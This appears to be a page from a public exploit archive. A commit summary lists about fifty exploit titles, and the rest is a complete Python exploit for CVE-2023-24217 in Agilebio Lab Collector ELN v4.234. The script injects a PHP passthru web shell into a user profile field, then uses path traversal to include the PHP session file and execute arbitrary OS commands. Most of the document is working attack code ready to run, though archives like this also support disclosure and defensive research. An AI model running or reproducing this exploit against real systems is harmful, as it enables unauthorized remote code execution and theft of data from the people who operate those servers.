
50 changes to exploits/shellcodes/ghdb Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI ABUS Security Camera TVIP 20000-21150 - LFI_ RCE and SSH Root Access Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated) Osprey Pump Controller 1.0.1 - (eventFileSelected) Command Injection Osprey Pump Controller 1.0.1 - (pseudonym) Semi-blind Command Injection Osprey Pump Controller 1.0.1 - (userName) Blind Command Injection Osprey Pump Controller 1.0.1 - Administrator Backdoor Access Osprey Pump Controller 1.0.1 - Authentication Bypass Credentials Modification Osprey Pump Controller 1.0.1 - Cross-Site Request Forgery Osprey Pump Controller 1.0.1 - Predictable Session Token / Session Hijack Osprey Pump Controller 1.0.1 - Unauthenticated File Disclosure Osprey Pump Controller 1.0.1 - Unauthenticated Remote Code Execution Exploit Osprey Pump Controller v1.0.1 - Unauthenticated Reflected XSS WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE HospitalRun 1.0.0-beta - Local Root Exploit for macOS Adobe Connect 10 - Username Disclosure craftercms 4.x.x - CORS EasyNas 1.1.0 - OS Command Injection Agilebio Lab Collector Electronic Lab Notebook v4.234 - Remote Code Execution (RCE) Art Gallery Management System Project in PHP v 1.0 - SQL injection atrocore 1.5.25 User interaction - Unauthenticated File upload - RCE Auto Dealer Management System 1.0 - Broken Access Control Exploit Auto Dealer Management System v1.0 - SQL Injection Auto Dealer Management System v1.0 - SQL Injection in sell_vehicle.php Auto Dealer Management System v1.0 - SQL Injection on manage_user.php Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload Best pos Management System v1.0 - SQL Injection ChurchCRM v4.5.3-121fcc1 - SQL Injection Dompdf 1.2.1 - Remote Code Execution (RCE) Employee Task Management System v1.0 - Broken Authentication Employee Task Management System v1.0 - SQL Injection on (task-details.php?task_id=?) Employee Task Management System v1.0 - SQL Injection on edit-task.php flatnux 2021-03.25 - Remote Code Execution (Authenticated) Intern Record System v1.0 - SQL Injection (Unauthenticated) Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking LDAP Tool Box Self Service Password v1.5.2 - Account takeover Music Gallery Site v1.0 - Broken Access Control Music Gallery Site v1.0 - SQL Injection on music_list.php Music Gallery Site v1.0 - SQL Injection on page Master.php Music Gallery Site v1.0 - SQL Injection on page view_music_details.php POLR URL 2.3.0 - Shortener Admin Takeover Purchase Order Management-1.0 - Local File Inclusion Simple Food Ordering System v1.0 - Cross-Site Scripting (XSS) Simple Task Managing System v1.0 - SQL Injection (Unauthenticated) modoboa 2.0.4 - Admin TakeOver pdfkit v0.8.7.2 - Command Injection FileZilla Client 3.63.1 - 'TextShaping.dl' DLL Hijacking Windows 11 10.0.22000 - Backup service Privilege Escalation TitanFTP 2.0.1.2102 - Path traversal to Remote Code Execution (RCE) Unified Remote 3.13.0 - Remote Code Execution (RCE)
127 lines
No EOL
4.9 KiB
Python
Executable file
127 lines
No EOL
4.9 KiB
Python
Executable file
# Exploit Title: Agilebio Lab Collector Electronic Lab Notebook v4.234 - Remote Code Execution (RCE)
|
|
# Date: 2023-02-28
|
|
# Exploit Author: Anthony Cole
|
|
# Vendor Homepage: https://labcollector.com/labcollector-lims/add-ons/eln-electronic-lab-notebook/
|
|
# Version: v4.234
|
|
# Contact: http://twitter.com/acole76
|
|
# Website: http://twitter.com/acole76
|
|
# Tested on: PHP/MYSQL
|
|
# CVE: CVE-2023-24217
|
|
# Category: webapps
|
|
#
|
|
# Lab Collector is a software written in PHP by Agilebio. Version v4.234 allows an authenticated user to execute os commands on the underlying operating system.
|
|
#
|
|
|
|
from argparse import ArgumentParser
|
|
from requests import Session
|
|
from random import choice
|
|
from string import ascii_lowercase, ascii_uppercase, digits
|
|
import re
|
|
from base64 import b64encode
|
|
from urllib.parse import quote_plus
|
|
|
|
sess:Session = Session()
|
|
cookies = {}
|
|
headers = {}
|
|
state = {}
|
|
|
|
def random_string(length:int) -> str:
|
|
return "".join(choice(ascii_lowercase+ascii_uppercase+digits) for i in range(length))
|
|
|
|
def login(base_url:str, username:str, password:str) -> bool:
|
|
data = {"login": username, "pass": password, "Submit":"", "action":"login"}
|
|
headers["Referer"] = f"{base_url}/login.php?%2Findex.php%3Fcontroller%3Duser_profile"
|
|
res = sess.post(f"{base_url}/login.php", data=data, headers=headers)
|
|
|
|
if("My profile" in res.text):
|
|
return res.text
|
|
else:
|
|
return None
|
|
|
|
def logout(base_url:str) -> bool:
|
|
headers["Referer"] = f"{base_url}//index.php?controller=user_profile&subcontroller=update"
|
|
sess.get(f"{base_url}/login.php?%2Findex.php%3Fcontroller%3Duser_profile%26subcontroller%3Dupdate",headers=headers)
|
|
|
|
def extract_field_value(contents, name):
|
|
value = re.findall(f'name="{name}" value="(.*)"', contents)
|
|
if(len(value)):
|
|
return value[0]
|
|
else:
|
|
return ""
|
|
|
|
def get_profile(html:str):
|
|
return {
|
|
"contact_name": extract_field_value(html, "contact_name"),
|
|
"contact_lab": extract_field_value(html, "contact_lab"),
|
|
"contact_address": extract_field_value(html, "contact_address"),
|
|
"contact_city": extract_field_value(html, "contact_city"),
|
|
"contact_zip": extract_field_value(html, "contact_zip"),
|
|
"contact_country": extract_field_value(html, "contact_country"),
|
|
"contact_tel": extract_field_value(html, "contact_tel"),
|
|
"contact_email": extract_field_value(html, "contact_email")
|
|
}
|
|
|
|
|
|
def update_profile(base_url:str, wrapper:str, param:str, data:dict) -> bool:
|
|
headers["Referer"] = f"{base_url}/index.php?controller=user_profile&subcontroller=update"
|
|
res = sess.post(f"{base_url}/index.php?controller=user_profile&subcontroller=update", data=data, headers=headers)
|
|
return True
|
|
|
|
def execute_command(base_url:str, wrapper:str, param:str, session_path:str, cmd:str):
|
|
session_file = sess.cookies.get("PHPSESSID")
|
|
headers["Referer"] = f"{base_url}/login.php?%2F"
|
|
page = f"../../../../../..{session_path}/sess_{session_file}"
|
|
res = sess.get(f"{base_url}/extra_modules/eln/index.php?page={page}&action=edit&id=1&{param}={quote_plus(cmd)}", headers=headers)
|
|
return parse_output(res.text, wrapper)
|
|
|
|
def exploit(args) -> None:
|
|
wrapper = random_string(5)
|
|
param = random_string(3)
|
|
html = login(args.url, args.login_username, args.login_password)
|
|
|
|
if(html == None):
|
|
print("unable to login")
|
|
return False
|
|
|
|
clean = get_profile(html)
|
|
data = get_profile(html)
|
|
tag = b64encode(wrapper.encode()).decode()
|
|
payload = f"<?php $t=base64_decode('{tag}');echo $t;passthru($_GET['{param}']);echo $t; ?>"
|
|
|
|
data["contact_name"] = payload #inject payload in name field
|
|
|
|
if(update_profile(args.url, wrapper, param, data)):
|
|
login(args.url, args.login_username, args.login_password) # reload the session w/ our payload
|
|
print(execute_command(args.url, wrapper, param, args.sessions, args.cmd))
|
|
update_profile(args.url, wrapper, param, clean) # revert the profile
|
|
|
|
logout(args.url)
|
|
|
|
|
|
def parse_output(contents, wrapper) -> None:
|
|
matches = re.findall(f"{wrapper}(.*)\s{wrapper}", contents, re.MULTILINE | re.DOTALL)
|
|
if(len(matches)):
|
|
return matches[0]
|
|
|
|
return None
|
|
|
|
def main() -> None:
|
|
parser:ArgumentParser = ArgumentParser(description="CVE-2023-24217")
|
|
parser.add_argument("--url", "-u", required=True, help="Base URL for the affected application.")
|
|
parser.add_argument("--login-username", "-lu", required=True, help="Username.")
|
|
parser.add_argument("--login-password", "-lp", required=True, help="Password.")
|
|
parser.add_argument("--cmd", "-c", required=True, help="OS command to execute.")
|
|
parser.add_argument("--sessions", "-s", required=False, default="/var/lib/php/session/", help="The location where php stores session files.")
|
|
|
|
args = parser.parse_args()
|
|
if(args.url.endswith("/")):
|
|
args.url = args.url[:-1]
|
|
|
|
if(args.sessions.endswith("/")):
|
|
args.sessions = args.sessions[:-1]
|
|
|
|
exploit(args)
|
|
pass
|
|
|
|
if(__name__ == "__main__"):
|
|
main() |